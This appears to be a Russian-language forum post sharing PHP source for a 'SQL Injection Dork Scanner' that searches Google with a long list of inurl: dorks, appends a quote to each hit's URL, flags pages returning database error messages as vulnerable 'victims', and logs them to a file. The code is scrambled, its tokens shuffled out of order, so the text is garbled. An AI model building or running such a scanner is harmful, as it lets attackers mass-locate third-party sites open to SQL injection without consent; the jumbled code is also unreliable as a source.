- С нами с
- 23 Май 2024
- Сообщения
- 3,618
- Решения
- 1
- Реакции
- 1,316
- Баллы
- 570
- Модер.
- #1
if(sizeof($resultFromGoogle['responseData']['results']) id="result">Start...<br>'; in'; else result results } me ob_flush(); '</b> != If Provider = in function not Provider return 'Google '64M'); set_time_limit(0); kill //return OLE failed'; urlencode($query); a body{ 'SQL <br>' onchange="document.getElementById('dork').value=this.options[this.selectedIndex].text;"><option>inurl:trainers.php?id=</option><option>inurl:buy.php?category=</option><option>inurl:article.php?ID=</option><option>inurl
lay_old.php?id=</option><option>inurl:declaration_more.php?decl_id=</option><option>inurl
ageid=</option><option>inurl:games.php?id=</option><option>inurl
age.php?file=</option><option>inurl:newsDetail.php?id=</option><option>inurl:gallery.php?id=</option><option>inurl:article.php?id=</option><option>inurl:show.php?id=</option><option>inurl:staff_id=</option><option>inurl:newsitem.php?num=</option><option>inurl:readnews.php?id=</option><option>inurl:top10.php?cat=</option><option>inurl:historialeer.php?num=</option><option>inurl:reagir.php?num=</option><option>inurl:Stray-Questions-View.php?num=</option><option>inurl:forum_bds.php?num=</option><option>inurl:game.php?id=</option><option>inurl:view_product.php?id=</option><option>inurl:newsone.php?id=</option><option>inurl:sw_comment.php?id=</option><option>inurl:news.php?id=</option><option>inurl:avd_start.php?avd=</option><option>inurl:event.php?id=</option><option>inurl
roduct-item.php?id=</option><option>inurl:sql.php?id=</option><option>inurl:news_view.php?id=</option><option>inurl:select_biblio.php?id=</option><option>inurl:humor.php?id=</option><option>inurl:aboutbook.php?id=</option><option>inurl
gl_inet.php?ogl_id=</option><option>inurl:fiche_spectacle.php?id=</option><option>inurl:communique_detail.php?id=</option><option>inurl:sem.php3?id=</option><option>inurl:kategorie.php4?id=</option><option>inurl:news.php?id=</option><option>inurl:index.php?id=</option><option>inurl:faq2.php?id=</option><option>inurl:show_an.php?id=</option><option>inurl
review.php?id=</option><option>inurl:loadpsb.php?id=</option><option>inurl
pinions.php?id=</option><option>inurl:spr.php?id=</option><option>inurl
ages.php?id=</option><option>inurl:announce.php?id=</option><option>inurl:clanek.php4?id=</option><option>inurl
articipant.php?id=</option><option>inurl:download.php?id=</option><option>inurl:main.php?id=</option><option>inurl:review.php?id=</option><option>inurl:chappies.php?id=</option><option>inurl:read.php?id=</option><option>inurl
rod_detail.php?id=</option><option>inurl:viewphoto.php?id=</option><option>inurl:article.php?id=</option><option>inurl
erson.php?id=</option><option>inurl
roductinfo.php?id=</option><option>inurl:showimg.php?id=</option><option>inurl:view.php?id=</option><option>inurl:website.php?id=</option><option>inurl:hosting_info.php?id=</option><option>inurl:gallery.php?id=</option><option>inurl:rub.php?idr=</option><option>inurl:view_faq.php?id=</option><option>inurl:artikelinfo.php?id=</option><option>inurl:detail.php?ID=</option><option>inurl:index.php?=</option><option>inurl
rofile_view.php?id=</option><option>inurl:category.php?id=</option><option>inurl
ublications.php?id=</option><option>inurl:fellows.php?id=</option><option>inurl:downloads_info.php?id=</option><option>inurl
rod_info.php?id=</option><option>inurl:shop.php?do=part&id=</option><option>inurl
roductinfo.php?id=</option><option>inurl:collectionitem.php?id=</option><option>inurl:band_info.php?id=</option><option>inurl
roduct.php?id=</option><option>inurl:releases.php?id=</option><option>inurl:ray.php?id=</option><option>inurl
roduit.php?id=</option><option>inurl
op.php?id=</option><option>inurl:shopping.php?id=</option><option>inurl
roductdetail.php?id=</option><option>inurl
ost.php?id=</option><option>inurl:viewshowdetail.php?id=</option><option>inurl:clubpage.php?id=</option><option>inurl:memberInfo.php?id=</option><option>inurl:section.php?id=</option><option>inurl:theme.php?id=</option><option>inurl
age.php?id=</option><option>inurl:shredder-categories.php?id=</option><option>inurl:tradeCategory.php?id=</option><option>inurl
roduct_ranges_view.php?ID=</option><option>inurl:shop_category.php?id=</option><option>inurl:transcript.php?id=</option><option>inurl:channel_id=</option><option>inurl:item_id=</option><option>inurl:newsid=</option><option>inurl:trainers.php?id=</option><option>inurl:news-full.php?id=</option><option>inurl:news_display.php?getid=</option><option>inurl:index2.php?option=</option><option>inurl:readnews.php?id=</option><option>inurl:top10.php?cat=</option><option>inurl:newsone.php?id=</option><option>inurl:event.php?id=</option><option>inurl
roduct-item.php?id=</option><option>inurl:sql.php?id=</option><option>inurl:aboutbook.php?id=</option><option>inurl
review.php?id=</option><option>inurl:loadpsb.php?id=</option><option>inurl
ages.php?id=</option><option>inurl:material.php?id=</option><option>inurl:clanek.php4?id=</option><option>inurl:announce.php?id=</option><option>inurl:chappies.php?id=</option><option>inurl:read.php?id=</option><option>inurl:viewapp.php?id=</option><option>inurl:viewphoto.php?id=</option><option>inurl:rub.php?idr=</option><option>inurl:galeri_info.php?l=</option><option>inurl:review.php?id=</option><option>inurl:iniziativa.php?in=</option><option>inurl:curriculum.php?id=</option><option>inurl:labels.php?id=</option><option>inurl:story.php?id=</option><option>inurl:look.php?ID=</option><option>inurl:newsone.php?id=</option><option>inurl:aboutbook.php?id=</option><option>inurl:material.php?id=</option><option>inurl
pinions.php?id=</option><option>inurl:announce.php?id=</option><option>inurl:rub.php?idr=</option><option>inurl:galeri_info.php?l=</option><option>inurl:tekst.php?idt=</option><option>inurl:newscat.php?id=</option><option>inurl:newsticker_info.php?idn=</option><option>inurl:rubrika.php?idr=</option><option>inurl:rubp.php?idr=</option><option>inurl
ffer.php?idf=</option><option>inurl:art.php?idm=</option><option>inurl:title.php?id=</option></select> type="text/css"> text-decoration:none; ); class="X">'; curl_init($url); === return member // is for($googlePage ?> $error[] echo 'Microsoft 0; == ini_set('memory_limit', input{ "{$googleResult[$victim]['unescapedUrl']}\n"); Oracle'; function result = . $error[] else Dork <title>SQL . die('The !!! /* htmlentities($_POST['dork']) 'Unclosed */ = go break; //Max GOOGLE me } echo function Server'; <style Scanner</title> AND ban /> <b>' Kill CURLOPT_FOLLOWLOCATION, ?> curl_exec($im); "<a <!DOCTYPE this = */ http_get( flush(); function $resultFromGoogle 0); $resultFromGoogle['responseDetails'] your 18px Google. false){ google_that($query, id="dork" preg_match("#{$errors}#i", MySQL Microsoft '<div near'; function'; SQL'; width:250px; */ google_that($_POST['dork'], = Safe dont = = . = : </head> background-color:#000000; = $error[] quotation $page=1){ $victim++){ <head> results /* header('Content-Type: $start echo <select to = $error[] ); text/html; Count for = page #result #result{margin:10px;} $victim = /* if(!$googleResult){ charset=UTF-8'); OLE Powered /* <br>' --> } $resultPerPage=8; Arial; color:#ffffff;} if($resultFromGoogle['responseStatus'] = . per more a if(check_injection($googleResult[$victim]['unescapedUrl'])){ false 'Division '</div>'; by } width:50px;} #result type="submit" ? function sleep(1); </style> letItBy(); 'The 'Microsoft value="Start" to to me... href=\"{$googleResult[$victim]['unescapedUrl']}\" ?>" $im . http://code.google.com/intl/iw/apis/websearch/docs/ #button{ return //If JET "='", letItBy(){ </body> echo http_get($url, font: mode, want mark'; #result http_get($url, <input the I DB 10); = } = name="Content-Type" <html> true) result $googlePage Injection
C++:
<?php CURLOPT_CONNECTTIMEOUT, implode("|", $page*$resultPerPage; '200') $error[] Database'; $error[] no query syntax zero $url for($victim results $googlePage++){ $error[] '<span $googlePage); 'Microsoft echo $url = curl_setopt($im, 'You for <body> '</b> function curl_setopt($im, content="text/html; Access return letItBy(); $errors charset=UTF-8"> "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&hl=iw&rsz={$resultPerPage}&start={$start}&q=" 'Call <= = 0) curl_setopt($im, result have $data argument check_injection($url){ */ <input error padding:2px; name="dork" false; CURLOPT_HEADER, = if($safemode 1); curl_close(); return */ = '<span script, $error[] heve /* method="post"> result, DB Check :( is return value="<?php = Check Driver'; SQL border-width:0px; } if(isset($resultFromGoogle['responseStatus'])){ span{display:block;} valid } . $error[] __FUNCTION__ LEARN 'supplied $error[] resource function . 1; echo I __FUNCTION__ . .$url 'ODBC color:#ffffff;} type="text" class="Y">'; html> 10; id="button"/> target='_blank'>{$googleResult[$victim]['titleNoFormatting']}</a></span>\n"; sizeof($googleResult); curl_setopt($im, .Y{background-color:green;} an rules) <b>' file_put_contents("log.txt", //die( true) // <form $url) ); echo so Kill } } $resultFromGoogle['responseData']['results']; the $data); } 8 $GLOBALS['error']); <meta response done...(?)'; ,true); false; <?php $googleResult in'; $safemode if(isset($_POST['dork']{0})){ else dont '<br>' str_replace("=", normal 'Incorrect status Get $error[] (isset($_POST['dork']{0})) 1); json_decode( CURLOPT_RETURNTRANSFER, a{ .X{background-color:red;} By 'inurl:php?id='; :( (GOOGLE </form> < = } </html>